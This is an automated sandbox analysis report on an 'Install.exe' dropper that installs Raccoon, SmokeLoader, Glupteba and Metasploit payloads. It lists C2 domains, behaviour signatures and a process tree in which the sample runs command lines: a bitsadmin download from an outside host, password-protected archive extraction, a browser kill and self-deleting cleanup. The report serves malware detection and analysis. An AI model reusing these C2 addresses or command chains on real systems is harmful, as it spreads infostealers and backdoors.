Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    139s
  • max time network
    580s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    26-04-2021 13:35

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 23 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 34 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1180
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2720
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2708
      • C:\Users\Admin\AppData\Local\Temp\Install.exe
        "C:\Users\Admin\AppData\Local\Temp\Install.exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:4436
        • C:\Users\Admin\AppData\Local\Temp\is-MFJGD.tmp\Install.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-MFJGD.tmp\Install.tmp" /SL5="$301DA,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:4880
          • C:\Users\Admin\AppData\Local\Temp\is-A0E5E.tmp\Ultra.exe
            "C:\Users\Admin\AppData\Local\Temp\is-A0E5E.tmp\Ultra.exe" /S /UID=burnerch1
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3212
            • C:\Program Files\Windows Portable Devices\MWVKXLWYFV\ultramediaburner.exe
              "C:\Program Files\Windows Portable Devices\MWVKXLWYFV\ultramediaburner.exe" /VERYSILENT
              4⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:3872
              • C:\Users\Admin\AppData\Local\Temp\is-1LHCI.tmp\ultramediaburner.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-1LHCI.tmp\ultramediaburner.tmp" /SL5="$40052,281924,62464,C:\Program Files\Windows Portable Devices\MWVKXLWYFV\ultramediaburner.exe" /VERYSILENT
                5⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of WriteProcessMemory
                PID:4016
                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                  6⤵
                  • Executes dropped EXE
                  PID:4056
            • C:\Users\Admin\AppData\Local\Temp\e6-d90ff-f38-40991-e50c2762c7ef5\Mowepiqiwa.exe
              "C:\Users\Admin\AppData\Local\Temp\e6-d90ff-f38-40991-e50c2762c7ef5\Mowepiqiwa.exe"
              4⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Modifies system certificate store
              • Suspicious use of AdjustPrivilegeToken
              PID:4116
            • C:\Users\Admin\AppData\Local\Temp\a7-0a11f-fb4-db999-bb04f9acb81c1\Raehacezhoti.exe
              "C:\Users\Admin\AppData\Local\Temp\a7-0a11f-fb4-db999-bb04f9acb81c1\Raehacezhoti.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4004
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wbeiquj4.a4i\instEU.exe & exit
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2120
                • C:\Users\Admin\AppData\Local\Temp\wbeiquj4.a4i\instEU.exe
                  C:\Users\Admin\AppData\Local\Temp\wbeiquj4.a4i\instEU.exe
                  6⤵
                  • Executes dropped EXE
                  PID:3480
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y0zrb4ic.pq2\google-game.exe & exit
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4824
                • C:\Users\Admin\AppData\Local\Temp\y0zrb4ic.pq2\google-game.exe
                  C:\Users\Admin\AppData\Local\Temp\y0zrb4ic.pq2\google-game.exe
                  6⤵
                    PID:4076
                    • C:\Windows\SysWOW64\rundll32.exe
                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                      7⤵
                      • Loads dropped DLL
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4156
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kicmgwy3.tcn\md1_1eaf.exe & exit
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3232
                  • C:\Users\Admin\AppData\Local\Temp\kicmgwy3.tcn\md1_1eaf.exe
                    C:\Users\Admin\AppData\Local\Temp\kicmgwy3.tcn\md1_1eaf.exe
                    6⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    PID:3440
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5hdmj5nm.x1e\askinstall39.exe & exit
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5032
                  • C:\Users\Admin\AppData\Local\Temp\5hdmj5nm.x1e\askinstall39.exe
                    C:\Users\Admin\AppData\Local\Temp\5hdmj5nm.x1e\askinstall39.exe
                    6⤵
                      PID:3248
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c taskkill /f /im chrome.exe
                        7⤵
                          PID:2204
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im chrome.exe
                            8⤵
                            • Kills process with taskkill
                            PID:5240
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0g1ia14q.3wr\y1.exe & exit
                      5⤵
                        PID:5352
                        • C:\Users\Admin\AppData\Local\Temp\0g1ia14q.3wr\y1.exe
                          C:\Users\Admin\AppData\Local\Temp\0g1ia14q.3wr\y1.exe
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:5504
                          • C:\Users\Admin\AppData\Local\Temp\zwQgrX45oa.exe
                            "C:\Users\Admin\AppData\Local\Temp\zwQgrX45oa.exe"
                            7⤵
                            • Executes dropped EXE
                            • Modifies system certificate store
                            PID:4364
                            • C:\Users\Admin\AppData\Roaming\1619446420589.exe
                              "C:\Users\Admin\AppData\Roaming\1619446420589.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619446420589.txt"
                              8⤵
                              • Executes dropped EXE
                              PID:5896
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\zwQgrX45oa.exe"
                              8⤵
                                PID:504
                                • C:\Windows\SysWOW64\PING.EXE
                                  ping 127.0.0.1 -n 3
                                  9⤵
                                  • Runs ping.exe
                                  PID:5708
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\0g1ia14q.3wr\y1.exe"
                              7⤵
                                PID:3236
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /T 10 /NOBREAK
                                  8⤵
                                  • Delays execution with timeout.exe
                                  PID:1544
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nk101fr0.zea\SunLabsPlayer.exe /S & exit
                            5⤵
                              PID:6108
                              • C:\Users\Admin\AppData\Local\Temp\nk101fr0.zea\SunLabsPlayer.exe
                                C:\Users\Admin\AppData\Local\Temp\nk101fr0.zea\SunLabsPlayer.exe /S
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Drops file in Program Files directory
                                PID:5328
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                  7⤵
                                    PID:4260
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                    7⤵
                                      PID:5772
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                      7⤵
                                        PID:5232
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                        7⤵
                                          PID:6012
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                          7⤵
                                            PID:5436
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                            7⤵
                                              PID:5796
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                              7⤵
                                              • Checks for any installed AV software in registry
                                              PID:4208
                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                              7⤵
                                              • Download via BitsAdmin
                                              PID:4696
                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peMb4BpZVBNLXLM1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                              7⤵
                                              • Executes dropped EXE
                                              • Drops file in Program Files directory
                                              PID:2936
                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pMlM8v3G9Pha8YLt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:4624
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                8⤵
                                                • Executes dropped EXE
                                                • Drops file in Program Files directory
                                                • Suspicious use of SetWindowsHookEx
                                                • Suspicious use of WriteProcessMemory
                                                PID:4076
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                              7⤵
                                                PID:5260
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:5944
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:4692
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:2068
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:3076
                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\gqAAFX\gqAAFX.dll" gqAAFX
                                                        7⤵
                                                        • Loads dropped DLL
                                                        PID:3600
                                                        • C:\Windows\system32\rundll32.exe
                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\gqAAFX\gqAAFX.dll" gqAAFX
                                                          8⤵
                                                          • Loads dropped DLL
                                                          • Drops file in System32 directory
                                                          PID:5864
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:196
                                                          • C:\Windows\System32\Conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            8⤵
                                                              PID:5856
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:5200
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:2808
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:4516
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy82C4.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:2796
                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                    7⤵
                                                                      PID:2576
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v1wpmnec.vc0\inst.exe & exit
                                                                  5⤵
                                                                    PID:5148
                                                                    • C:\Users\Admin\AppData\Local\Temp\v1wpmnec.vc0\inst.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\v1wpmnec.vc0\inst.exe
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:5344
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cno20ll4.3qp\GcleanerWW.exe /mixone & exit
                                                                    5⤵
                                                                      PID:5576
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lpaabpst.i1u\toolspab1.exe & exit
                                                                      5⤵
                                                                        PID:5856
                                                                        • C:\Users\Admin\AppData\Local\Temp\lpaabpst.i1u\toolspab1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\lpaabpst.i1u\toolspab1.exe
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:6048
                                                                          • C:\Users\Admin\AppData\Local\Temp\lpaabpst.i1u\toolspab1.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\lpaabpst.i1u\toolspab1.exe
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:5716
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zxc2ch03.sxw\app.exe /8-2222 & exit
                                                                        5⤵
                                                                          PID:2244
                                                                          • C:\Users\Admin\AppData\Local\Temp\zxc2ch03.sxw\app.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\zxc2ch03.sxw\app.exe /8-2222
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Modifies system certificate store
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:3248
                                                                            • C:\Users\Admin\AppData\Local\Temp\zxc2ch03.sxw\app.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\zxc2ch03.sxw\app.exe" /8-2222
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Modifies data under HKEY_USERS
                                                                              PID:5920
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\br5le5s0.k0u\c7ae36fa.exe & exit
                                                                          5⤵
                                                                            PID:6096
                                                                            • C:\Users\Admin\AppData\Local\Temp\br5le5s0.k0u\c7ae36fa.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\br5le5s0.k0u\c7ae36fa.exe
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:5376
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                    1⤵
                                                                      PID:2608
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                      1⤵
                                                                        PID:2400
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                        1⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2380
                                                                      • \??\c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                        1⤵
                                                                        • Suspicious use of SetThreadContext
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:4536
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                          2⤵
                                                                          • Drops file in System32 directory
                                                                          • Checks processor information in registry
                                                                          • Modifies data under HKEY_USERS
                                                                          • Modifies registry class
                                                                          PID:1868
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                        1⤵
                                                                          PID:1924
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                          1⤵
                                                                            PID:1448
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                            1⤵
                                                                              PID:1340
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                              1⤵
                                                                                PID:1128
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                1⤵
                                                                                • Drops file in System32 directory
                                                                                PID:512
                                                                                • C:\Users\Admin\AppData\Roaming\dehfcis
                                                                                  C:\Users\Admin\AppData\Roaming\dehfcis
                                                                                  2⤵
                                                                                    PID:500
                                                                                    • C:\Users\Admin\AppData\Roaming\dehfcis
                                                                                      C:\Users\Admin\AppData\Roaming\dehfcis
                                                                                      3⤵
                                                                                        PID:4008
                                                                                    • C:\Users\Admin\AppData\Roaming\dchfcis
                                                                                      C:\Users\Admin\AppData\Roaming\dchfcis
                                                                                      2⤵
                                                                                        PID:4624
                                                                                    • c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                      1⤵
                                                                                        PID:356
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                        1⤵
                                                                                        • Drops file in Windows directory
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:3564
                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                        1⤵
                                                                                        • Modifies Internet Explorer settings
                                                                                        PID:1540
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3972
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies Internet Explorer settings
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1800
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:5680
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:5584
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:5600
                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                        1⤵
                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                        PID:4268
                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                        1⤵
                                                                                          PID:2028
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                            PID:6100
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                              PID:1528
                                                                                            • C:\Windows\explorer.exe
                                                                                              C:\Windows\explorer.exe
                                                                                              1⤵
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:5560
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                                PID:3788
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe
                                                                                                1⤵
                                                                                                  PID:4620
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:1020
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:6132
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:2264
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                        1⤵
                                                                                                          PID:5404
                                                                                                        • \??\c:\windows\system32\svchost.exe
